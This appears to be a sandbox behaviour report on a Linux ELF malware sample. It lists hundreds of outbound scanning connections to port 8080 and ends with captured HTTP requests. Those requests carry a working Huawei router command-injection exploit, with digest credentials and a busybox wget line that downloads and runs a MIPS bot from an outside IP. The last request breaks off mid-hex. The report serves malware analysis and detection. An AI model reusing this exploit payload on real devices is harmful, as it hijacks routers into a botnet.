    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.255.66.218:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.154.68.148:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.199.249.114:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.207.217.214:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.112.48.121:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.104.51.231:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.192.123.137:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.211.196.29:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.156.62.211:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.184.219.20:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.110.82.140:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.88.157.216:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.76.102.17:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.53.54.192:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.213.49.134:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.16.81.75:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.129.110.141:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.35.47.77:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.226.94.215:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.52.73.147:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.177.175.131:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.150.107.114:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.223.46.249:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.163.80.241:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.168.118.49:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.250.254.212:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.199.231.136:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.249.219.102:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.215.53.67:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.210.169.25:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.113.157.163:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.142.74.15:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.203.15.100:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.241.106.155:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.238.93.85:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.186.168.255:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.118.26.103:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.197.120.19:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.31.138.229:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.204.169.95:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.74.80.129:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.128.184.186:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.22.124.46:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.8.190.96:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.96.145.174:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.34.137.81:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.173.252.52:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.229.4.213:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.83.168.126:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.219.104.88:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.82.99.153:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.20.77.157:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.143.197.161:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.240.34.221:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.214.56.150:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.143.245.182:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.188.58.31:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.238.185.235:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.139.108.124:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.122.154.66:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.93.164.167:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.248.137.29:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.249.235.91:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.233.62.120:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.203.14.205:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.219.245.194:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.63.187.231:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.34.139.137:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.189.143.202:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.69.69.244:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.80.194.33:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.240.22.155:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.58.171.196:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.28.129.169:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.7.250.67:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.146.26.82:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.107.43.145:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.43.63.113:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.140.210.52:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.68.22.31:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.59.81.173:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.200.62.148:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.141.173.129:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.133.49.26:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.100.5.104:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.84.57.33:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.187.232.233:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.219.164.61:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.40.202.187:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.36.22.14:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.158.246.229:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.41.210.63:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.46.172.195:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.44.158.173:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.172.218.73:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.155.232.224:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.148.222.120:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.145.64.109:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.112.217.28:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.169.243.137:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.192.128.174:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.4.233.13:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.68.191.31:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.170.76.20:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.183.67.148:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.94.43.47:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.24.168.133:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.200.168.197:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.35.75.28:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.99.250.3:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.151.165.131:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.168.2.58:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.108.161.227:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.217.248.44:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.16.47.170:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.29.84.244:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.31.104.203:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.231.185.49:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.42.54.208:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.53.39.132:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.147.234.128:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.127.204.145:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.68.186.142:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.103.116.182:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.252.109.246:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.29.174.148:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.181.17.206:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.120.4.194:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.79.217.177:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.157.60.148:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.87.162.3:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.211.151.24:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.211.172.218:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.17.181.129:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.202.11.118:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.235.70.209:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.71.240.142:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.184.219.54:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.225.193.160:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.21.207.205:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.128.116.65:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.200.169.19:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.1.153.123:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.171.93.69:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.126.50.183:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.19.128.235:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.29.131.120:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.165.211.145:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.167.70.191:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.23.198.245:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.158.20.236:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.180.84.248:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.179.83.2:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.247.237.84:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.203.26.64:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.60.217.252:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.31.214.148:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.90.70.166:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.13.241.29:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.193.99.147:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.27.11.6:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.175.153.194:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.18.121.49:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.139.73.94:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.166.165.187:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.155.81.174:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.72.1.203:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.157.111.208:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.224.224.241:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.124.66.211:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.129.204.141:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.114.145.228:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.65.91.180:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.186.96.213:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.77.30.242:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.152.10.220:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.3.119.229:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.131.215.91:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.223.145.233:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.150.220.6:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.209.197.221:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.23.232.149:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.201.175.200:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.211.3.6:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.88.6.139:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.254.49.239:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.107.84.196:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.227.100.179:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.218.38.158:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.230.252.4:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.127.185.116:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.36.129.9:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.144.219.206:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.2.185.105:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.201.4.4:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.157.247.4:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.48.58.208:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.231.241.87:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.213.155.141:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.45.17.25:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.101.93.0:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.14.52.99:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.174.42.226:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.11.215.243:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.65.67.65:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.152.163.239:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.160.240.203:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.47.225.188:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.40.53.228:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.101.194.149:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.154.191.81:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.57.170.210:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.47.173.137:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.126.183.76:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.239.91.94:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.11.44.107:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.194.58.61:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.109.119.84:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.183.149.134:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.221.82.26:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.154.93.0:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.2.115.87:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.138.78.152:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.77.20.219:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.147.177.109:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.147.88.149:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.199.68.161:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.132.169.195:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.222.240.82:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.215.194.49:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.183.114.171:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.210.166.97:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.38.220.235:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.127.218.160:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.7.187.207:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.183.73.159:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.100.245.136:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.147.40.93:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.238.198.82:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.202.82.23:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.128.123.235:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.67.77.224:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.89.20.204:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.140.154.75:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.237.158.116:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.158.16.174:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.205.216.184:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.42.159.195:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.162.143.111:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.87.104.153:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.109.14.227:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.23.141.96:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.198.10.183:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.180.167.176:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.18.51.102:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.196.128.60:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.172.142.55:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.20.161.189:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.13.207.232:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.124.252.192:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.3.161.242:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.103.166.50:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.216.88.155:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.21.211.211:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.251.30.161:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.211.111.159:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.250.176.224:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.13.206.12:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.123.5.162:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.185.10.92:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.105.190.46:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.236.31.29:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.28.87.255:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.62.23.154:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.86.244.165:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.12.49.49:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.200.151.246:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.74.18.147:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.44.254.105:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.226.19.132:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.126.249.254:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.62.177.28:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.103.56.254:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.203.150.183:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.160.246.191:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.100.227.79:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.2.112.159:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.219.55.72:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.125.172.115:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.75.35.70:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.23.33.245:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.133.232.26:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.70.42.236:8080
    Source: /tmp/kTnqWHyjjG.elf (PID: 5475)Socket: 0.0.0.0::0Jump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5481)Socket: 0.0.0.0::0Jump to behavior
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 